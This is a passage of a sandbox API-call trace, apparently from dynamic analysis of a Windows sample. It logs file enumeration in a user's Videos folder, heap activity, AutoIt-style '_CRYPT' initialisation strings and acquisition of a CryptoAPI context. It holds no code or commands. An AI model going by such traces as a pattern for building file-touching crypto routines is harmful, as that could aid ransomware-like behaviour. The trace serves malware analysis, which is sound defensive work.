lpFileName="C:\\Users\\FD1HVy\\Videos/0FMiSmnvsI1v8s.swf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ff9bd0, ftCreationTime.dwHighDateTime=0x1d5e6d7, ftLastAccessTime.dwLowDateTime=0xa302c9c0, ftLastAccessTime.dwHighDateTime=0x1d5e770, ftLastWriteTime.dwLowDateTime=0xa302c9c0, ftLastWriteTime.dwHighDateTime=0x1d5e770, nFileSizeHigh=0x0, nFileSizeLow=0x90f2, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="0FMiSmnvsI1v8s.swf", cAlternateFileName="0FMISM~1.SWF")) returned 0xa87290 [0257.065] FindClose (in: hFindFile=0xa87290 | out: hFindFile=0xa87290) returned 1 [0257.065] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0257.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0257.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0257.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0257.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0257.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0257.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0257.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0257.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0257.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0257.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0257.066] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0257.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0257.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0257.066] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0257.066] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0257.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55bc8 [0257.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0257.066] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0257.066] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0257.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0257.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0257.066] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0257.067] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0257.067] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0257.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0257.067] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0257.067] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0257.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0257.067] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0257.067] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0257.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0257.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0257.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0257.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0257.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0257.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0257.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0257.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0257.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0257.239] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0257.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0257.239] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0257.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0257.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0257.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0257.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0257.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0257.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0257.239] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0257.239] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0257.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0257.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0257.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0257.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0257.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56060 [0257.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0257.240] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0257.240] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0257.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0257.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0257.240] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0257.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0257.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0257.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0257.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0257.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0257.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0257.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0257.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0257.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0257.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0257.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0257.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0257.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0257.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0257.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0257.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0257.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0257.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0257.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0257.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0257.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0257.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0257.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0257.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0257.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0257.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0257.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0257.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0257.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0257.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0257.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0257.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0257.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0257.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0257.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0257.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0257.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0257.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0257.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0257.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0257.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0257.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0257.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0257.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0257.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0257.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0257.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0257.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0257.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0257.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0257.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0257.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0257.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0257.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0257.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0257.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0257.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0257.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0257.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0257.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0257.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0257.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0257.243] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0257.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0257.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0257.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0257.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e68 [0257.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0257.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0257.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0257.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e698c8 [0257.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e698c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0257.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0257.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0257.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0257.243] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0257.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0257.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0257.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e68 | out: hHeap=0x970000) returned 1 [0257.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0257.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0257.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0257.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0257.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0257.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0257.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0257.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0257.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0257.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0257.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0257.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0257.244] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0257.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0257.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0257.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0257.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0257.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0257.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0257.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0257.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0257.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0257.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0257.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0257.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0257.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0257.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0257.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0257.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0257.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0257.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0257.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0257.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0257.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0257.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0257.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0257.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0257.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0257.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0257.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0257.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0257.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0257.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0257.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0257.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0257.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0257.246] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0257.246] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0257.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 